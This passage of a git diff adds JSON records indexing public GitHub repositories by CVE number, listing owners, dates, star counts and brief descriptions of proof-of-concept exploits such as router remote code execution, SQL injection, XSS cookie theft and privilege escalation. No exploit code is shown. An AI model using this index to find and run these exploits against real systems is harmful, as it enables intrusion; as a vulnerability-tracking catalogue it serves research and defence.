"2023-07-10T02:34:01Z", + "updated_at": "2024-11-19T01:36:09Z", + "pushed_at": "2023-11-22T07:48:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45436.json b/2022/CVE-2022-45436.json new file mode 100644 index 0000000000..fa911b2bc9 --- /dev/null +++ b/2022/CVE-2022-45436.json @@ -0,0 +1,33 @@ +[ + { + "id": 602654488, + "name": "CVE-2022-45436", + "full_name": "damodarnaik\/CVE-2022-45436", + "owner": { + "login": "damodarnaik", + "id": 48156631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48156631?v=4", + "html_url": "https:\/\/github.com\/damodarnaik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/damodarnaik\/CVE-2022-45436", + "description": null, + "fork": false, + "created_at": "2023-02-16T17:03:30Z", + "updated_at": "2023-02-16T17:03:30Z", + "pushed_at": "2023-02-16T17:26:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45451.json b/2022/CVE-2022-45451.json new file mode 100644 index 0000000000..184369e246 --- /dev/null +++ b/2022/CVE-2022-45451.json @@ -0,0 +1,33 @@ +[ + { + "id": 578740451, + "name": "CVE-2022-45451", + "full_name": "alfarom256\/CVE-2022-45451", + "owner": { + "login": "alfarom256", + "id": 36286171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36286171?v=4", + "html_url": "https:\/\/github.com\/alfarom256", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alfarom256\/CVE-2022-45451", + "description": "PoC for Acronis Arbitrary File Read - CVE-2022-45451", + "fork": false, + "created_at": "2022-12-15T19:16:20Z", + "updated_at": "2024-06-21T00:10:37Z", + "pushed_at": "2022-12-20T17:04:34Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45472.json b/2022/CVE-2022-45472.json new file mode 100644 index 0000000000..a09c5e1ed2 --- /dev/null +++ b/2022/CVE-2022-45472.json @@ -0,0 +1,33 @@ +[ + { + "id": 569465962, + "name": "CVE-2022-45472", + "full_name": "nicbrinkley\/CVE-2022-45472", + "owner": { + "login": "nicbrinkley", + "id": 72578931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72578931?v=4", + "html_url": "https:\/\/github.com\/nicbrinkley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nicbrinkley\/CVE-2022-45472", + "description": "DOM Based XSS", + "fork": false, + "created_at": "2022-11-22T22:21:49Z", + "updated_at": "2022-12-10T11:38:24Z", + "pushed_at": "2022-11-22T22:32:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45477.json b/2022/CVE-2022-45477.json new file mode 100644 index 0000000000..ec2058a1b3 --- /dev/null +++ b/2022/CVE-2022-45477.json @@ -0,0 +1,39 @@ +[ + { + "id": 606922362, + "name": "nmap-vulnerability-scan-scripts", + "full_name": "M507\/nmap-vulnerability-scan-scripts", + "owner": { + "login": "M507", + "id": 38591075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4", + "html_url": "https:\/\/github.com\/M507", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M507\/nmap-vulnerability-scan-scripts", + "description": "nmap detection scripts for CVE-2022-45477, CVE-2022-45479, CVE-2022-45482, CVE-2022-45481", + "fork": false, + "created_at": "2023-02-26T23:39:42Z", + "updated_at": "2024-11-06T12:30:05Z", + "pushed_at": "2024-04-19T19:57:39Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "network-discovery", + "nmap-scan-script", + "nmap-scripts", + "vulnerability-detection", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45511.json b/2022/CVE-2022-45511.json new file mode 100644 index 0000000000..e56037b35d --- /dev/null +++ b/2022/CVE-2022-45511.json @@ -0,0 +1,33 @@ +[ + { + "id": 580810964, + "name": "cve-2022-45511", + "full_name": "kinderscsaa\/cve-2022-45511", + "owner": { + "login": "kinderscsaa", + "id": 52599926, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52599926?v=4", + "html_url": "https:\/\/github.com\/kinderscsaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kinderscsaa\/cve-2022-45511", + "description": null, + "fork": false, + "created_at": "2022-12-21T14:06:20Z", + "updated_at": "2022-12-21T14:06:20Z", + "pushed_at": "2022-12-21T14:06:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45544.json b/2022/CVE-2022-45544.json new file mode 100644 index 0000000000..1ae43e8b9e --- /dev/null +++ b/2022/CVE-2022-45544.json @@ -0,0 +1,33 @@ +[ + { + "id": 597871098, + "name": "CVE-2022-45544", + "full_name": "tristao-marinho\/CVE-2022-45544", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2022-45544", + "description": "SCHLIX CMS 2.2.7-2 arbitrary File Upload", + "fork": false, + "created_at": "2023-02-05T21:45:37Z", + "updated_at": "2023-02-05T21:45:37Z", + "pushed_at": "2023-02-05T23:45:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45599.json b/2022/CVE-2022-45599.json new file mode 100644 index 0000000000..5acd303eab --- /dev/null +++ b/2022/CVE-2022-45599.json @@ -0,0 +1,33 @@ +[ + { + "id": 604672421, + "name": "CVE-2022-45599", + "full_name": "ethancunt\/CVE-2022-45599", + "owner": { + "login": "ethancunt", + "id": 25339018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25339018?v=4", + "html_url": "https:\/\/github.com\/ethancunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethancunt\/CVE-2022-45599", + "description": null, + "fork": false, + "created_at": "2023-02-21T14:55:21Z", + "updated_at": "2023-02-21T14:58:57Z", + "pushed_at": "2023-02-21T15:05:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45600.json b/2022/CVE-2022-45600.json new file mode 100644 index 0000000000..289c583e5f --- /dev/null +++ b/2022/CVE-2022-45600.json @@ -0,0 +1,33 @@ +[ + { + "id": 604671777, + "name": "CVE-2022-45600", + "full_name": "ethancunt\/CVE-2022-45600", + "owner": { + "login": "ethancunt", + "id": 25339018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25339018?v=4", + "html_url": "https:\/\/github.com\/ethancunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethancunt\/CVE-2022-45600", + "description": null, + "fork": false, + "created_at": "2023-02-21T14:53:54Z", + "updated_at": "2023-02-21T14:58:54Z", + "pushed_at": "2023-02-21T14:54:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45688.json b/2022/CVE-2022-45688.json new file mode 100644 index 0000000000..658816f7f9 --- /dev/null +++ b/2022/CVE-2022-45688.json @@ -0,0 +1,157 @@ +[ + { + "id": 736427980, + "name": "jsonorg-tp1", + "full_name": "scabench\/jsonorg-tp1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-tp1", + "description": "simple application with a CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-27T22:05:06Z", + "updated_at": "2023-12-27T22:58:41Z", + "pushed_at": "2024-01-21T01:37:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736807099, + "name": "jsonorg-fp1", + "full_name": "scabench\/jsonorg-fp1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fp1", + "description": "simple application with a (unreachable!) CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-28T23:52:36Z", + "updated_at": "2024-01-08T20:16:26Z", + "pushed_at": "2024-01-05T06:20:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736810389, + "name": "jsonorg-fp2", + "full_name": "scabench\/jsonorg-fp2", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fp2", + "description": "simple application with a (unreachable!) CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-29T00:14:20Z", + "updated_at": "2023-12-29T02:00:00Z", + "pushed_at": "2024-01-05T06:22:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736826577, + "name": "jsonorg-fp3", + "full_name": "scabench\/jsonorg-fp3", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fp3", + "description": "simple application with a (unreachable!) CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-29T02:01:22Z", + "updated_at": "2023-12-29T08:19:56Z", + "pushed_at": "2024-01-05T06:24:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746077851, + "name": "jsonorg-fn1", + "full_name": "scabench\/jsonorg-fn1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fn1", + "description": "simple application with a CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2024-01-21T01:28:23Z", + "updated_at": "2024-01-21T12:04:15Z", + "pushed_at": "2024-01-21T01:44:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45701.json b/2022/CVE-2022-45701.json new file mode 100644 index 0000000000..b9a52129c8 --- /dev/null +++ b/2022/CVE-2022-45701.json @@ -0,0 +1,83 @@ +[ + { + "id": 602214790, + "name": "CVE-2022-45701", + "full_name": "yerodin\/CVE-2022-45701", + "owner": { + "login": "yerodin", + "id": 9205071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4", + "html_url": "https:\/\/github.com\/yerodin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-45701", + "description": "Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) POC Exploit (CVE-2022-45701)", + "fork": false, + "created_at": "2023-02-15T18:31:32Z", + "updated_at": "2024-07-24T05:54:30Z", + "pushed_at": "2023-02-16T18:15:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 840470520, + "name": "CVE-2022-45701", + "full_name": "geniuszly\/CVE-2022-45701", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2022-45701", + "description": "it is script designed to exploit certain vulnerabilities in routers by sending payloads through SNMP (Simple Network Management Protocol). The script automates the process of authorization, payload generation, and execution, allowing for remote command execution on the target device.", + "fork": false, + "created_at": "2024-08-09T19:30:20Z", + "updated_at": "2024-10-06T16:41:27Z", + "pushed_at": "2024-08-09T19:31:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arris", + "arris-modem", + "arris-router", + "buffer-overflow", + "cve", + "cve-2022-45701", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "penetration-testing", + "poc", + "python", + "security", + "snmp", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45728.json b/2022/CVE-2022-45728.json new file mode 100644 index 0000000000..637edc1f6d --- /dev/null +++ b/2022/CVE-2022-45728.json @@ -0,0 +1,33 @@ +[ + { + "id": 585251034, + "name": "CVE-2022-45728", + "full_name": "sudoninja-noob\/CVE-2022-45728", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45728", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:41:57Z", + "updated_at": "2023-01-04T17:41:57Z", + "pushed_at": "2023-01-04T17:43:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45729.json b/2022/CVE-2022-45729.json new file mode 100644 index 0000000000..86fe93fe02 --- /dev/null +++ b/2022/CVE-2022-45729.json @@ -0,0 +1,33 @@ +[ + { + "id": 585253557, + "name": "CVE-2022-45729", + "full_name": "sudoninja-noob\/CVE-2022-45729", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45729", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:50:00Z", + "updated_at": "2023-01-04T17:50:00Z", + "pushed_at": "2023-01-04T17:50:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45770.json b/2022/CVE-2022-45770.json new file mode 100644 index 0000000000..e60231df22 --- /dev/null +++ b/2022/CVE-2022-45770.json @@ -0,0 +1,33 @@ +[ + { + "id": 591626374, + "name": "CVE-2022-45770", + "full_name": "Marsel-marsel\/CVE-2022-45770", + "owner": { + "login": "Marsel-marsel", + "id": 19998507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19998507?v=4", + "html_url": "https:\/\/github.com\/Marsel-marsel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marsel-marsel\/CVE-2022-45770", + "description": "LPE exploit via windows driver", + "fork": false, + "created_at": "2023-01-21T10:32:02Z", + "updated_at": "2023-09-02T18:57:44Z", + "pushed_at": "2023-04-25T07:54:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45771.json b/2022/CVE-2022-45771.json new file mode 100644 index 0000000000..20712eca91 --- /dev/null +++ b/2022/CVE-2022-45771.json @@ -0,0 +1,75 @@ +[ + { + "id": 577691389, + "name": "CVE-2022-45771-Pwndoc-LFI-to-RCE", + "full_name": "p0dalirius\/CVE-2022-45771-Pwndoc-LFI-to-RCE", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2022-45771-Pwndoc-LFI-to-RCE", + "description": "Pwndoc local file inclusion to remote code execution of Node.js code on the server", + "fork": false, + "created_at": "2022-12-13T10:03:14Z", + "updated_at": "2024-08-12T20:28:51Z", + "pushed_at": "2023-09-14T20:19:41Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-45771", + "exploit", + "pwndoc", + "rce" + ], + "visibility": "public", + "forks": 9, + "watchers": 46, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 600465186, + "name": "CVE-2022-45771", + "full_name": "yuriisanin\/CVE-2022-45771", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-45771", + "description": "[PoC] Privilege escalation & code execution via LFI in PwnDoC ", + "fork": false, + "created_at": "2023-02-11T15:26:14Z", + "updated_at": "2024-11-22T18:47:15Z", + "pushed_at": "2023-02-11T15:30:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "privesc", + "privilege-escalation", + "pwndoc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45808.json b/2022/CVE-2022-45808.json new file mode 100644 index 0000000000..cf533ec1eb --- /dev/null +++ b/2022/CVE-2022-45808.json @@ -0,0 +1,33 @@ +[ + { + "id": 680205273, + "name": "CVE-2022-45808", + "full_name": "RandomRobbieBF\/CVE-2022-45808", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-45808", + "description": "LearnPress Plugin < 4.2.0 - Unauthenticated SQLi", + "fork": false, + "created_at": "2023-08-18T15:43:50Z", + "updated_at": "2024-08-12T20:32:31Z", + "pushed_at": "2023-08-18T15:45:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45934.json b/2022/CVE-2022-45934.json new file mode 100644 index 0000000000..99783cf2fd --- /dev/null +++ b/2022/CVE-2022-45934.json @@ -0,0 +1,95 @@ +[ + { + "id": 591176120, + "name": "linux-4.19.72_CVE-2022-45934", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2022-45934", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2022-45934", + "description": null, + "fork": false, + "created_at": "2023-01-20T05:00:05Z", + "updated_at": "2023-03-10T01:13:39Z", + "pushed_at": "2023-01-20T05:09:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 591256259, + "name": "linux-4.1.15_CVE-2022-45934", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2022-45934", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2022-45934", + "description": null, + "fork": false, + "created_at": "2023-01-20T10:03:07Z", + "updated_at": "2023-03-10T01:20:04Z", + "pushed_at": "2023-01-20T10:08:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618323077, + "name": "linux-4.1.15_CVE-2022-45934", + "full_name": "Satheesh575555\/linux-4.1.15_CVE-2022-45934", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.1.15_CVE-2022-45934", + "description": null, + "fork": false, + "created_at": "2023-03-24T08:16:44Z", + "updated_at": "2023-03-24T08:21:50Z", + "pushed_at": "2023-03-24T08:19:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45988.json b/2022/CVE-2022-45988.json new file mode 100644 index 0000000000..ceaa0f52ea --- /dev/null +++ b/2022/CVE-2022-45988.json @@ -0,0 +1,33 @@ +[ + { + "id": 569575443, + "name": "CVE-2022-45988", + "full_name": "happy0717\/CVE-2022-45988", + "owner": { + "login": "happy0717", + "id": 36958703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36958703?v=4", + "html_url": "https:\/\/github.com\/happy0717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happy0717\/CVE-2022-45988", + "description": "CVE-2022-45988 StarSoftComm HP CooCare An elevation of privilege vulnerability exists", + "fork": false, + "created_at": "2022-11-23T06:17:02Z", + "updated_at": "2023-03-03T09:21:53Z", + "pushed_at": "2023-03-04T09:59:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46080.json b/2022/CVE-2022-46080.json new file mode 100644 index 0000000000..86bcff226b --- /dev/null +++ b/2022/CVE-2022-46080.json @@ -0,0 +1,84 @@ +[ + { + "id": 662043677, + "name": "CVE-2022-46080", + "full_name": "yerodin\/CVE-2022-46080", + "owner": { + "login": "yerodin", + "id": 9205071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4", + "html_url": "https:\/\/github.com\/yerodin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-46080", + "description": "Nexxt Router 15.03.06.60 Authentication Bypass and Remote Command Execution", + "fork": false, + "created_at": "2023-07-04T08:31:04Z", + "updated_at": "2023-11-08T19:15:20Z", + "pushed_at": "2023-07-04T08:31:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840471119, + "name": "CVE-2022-46080", + "full_name": "geniuszly\/CVE-2022-46080", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2022-46080", + "description": "it is script that enables Telnet on routers by sending a specially crafted request. The script allows users to specify the router's URL, Telnet port, and password. It validates the inputs and logs the process, providing feedback on whether the exploit was successful.", + "fork": false, + "created_at": "2024-08-09T19:32:32Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-11T07:29:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2022-46080", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "nexxt", + "nexxt-router", + "penetration-testing", + "poc", + "rce", + "rce-exploit", + "router", + "security", + "telnet", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46087.json b/2022/CVE-2022-46087.json new file mode 100644 index 0000000000..3e69c84029 --- /dev/null +++ b/2022/CVE-2022-46087.json @@ -0,0 +1,33 @@ +[ + { + "id": 616850712, + "name": "CVE-2022-46087", + "full_name": "G37SYS73M\/CVE-2022-46087", + "owner": { + "login": "G37SYS73M", + "id": 77768845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4", + "html_url": "https:\/\/github.com\/G37SYS73M", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2022-46087", + "description": "CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.", + "fork": false, + "created_at": "2023-03-21T08:02:48Z", + "updated_at": "2023-03-21T08:02:48Z", + "pushed_at": "2023-03-21T08:03:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46104.json b/2022/CVE-2022-46104.json new file mode 100644 index 0000000000..950ae68af5 --- /dev/null +++ b/2022/CVE-2022-46104.json @@ -0,0 +1,33 @@ +[ + { + "id": 590562074, + "name": 